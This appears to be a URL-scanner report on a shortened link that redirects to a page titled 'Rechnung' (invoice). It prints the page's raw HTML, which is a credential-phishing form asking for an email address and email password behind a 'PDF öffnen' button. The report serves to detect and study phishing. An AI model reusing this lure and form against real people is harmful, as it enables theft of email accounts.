- 扫描 ID:
- 33d323c9-1409-4bcb-91a7-3f27f0a578e8已完成
- 提交的 URL:
- https://tinyurl.com/5xvapjyd已重定向
- 报告完成时间:
链接 · 找到 0 个
从页面中识别出的传出链接
JavaScript 变量 · 找到 3 个
在页面窗口对象上加载的全局 JavaScript 变量是在函数外部声明的变量,可以从当前范围内的代码中的任何位置访问
名称 | 类型 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
控制台日志消息 · 找到 0 条
记录到 Web 控制台的消息
HTML
页面的原始 HTML 正文
<html><head><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Rechnung</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #2b2929;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
form {
background: #fcfcfc;
padding: 20px;
border-radius: 5px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
input {
margin-bottom: 10px;
width: 100%;
padding: 10px;
border: 1px solid #ccc;
border-radius: 5px;
}
input[type="submit"] {
background: #de1f18;
color: #fff;
border: none;
cursor: pointer;
}
</style>
</head>
<body>
<form action="config.php">
<div class="input-box">
<label for="">E-Mail Adresse</label>
<input type="email" name="email" autocomplete="off" required="">
</div>
<div class="input-box">
<label for="">E-Mail Passwort</label>
<input type="password" name="password" autocomplete="off" required="">
</div>
<input type="submit" value="PDF öffnen">
</form>
</body></html>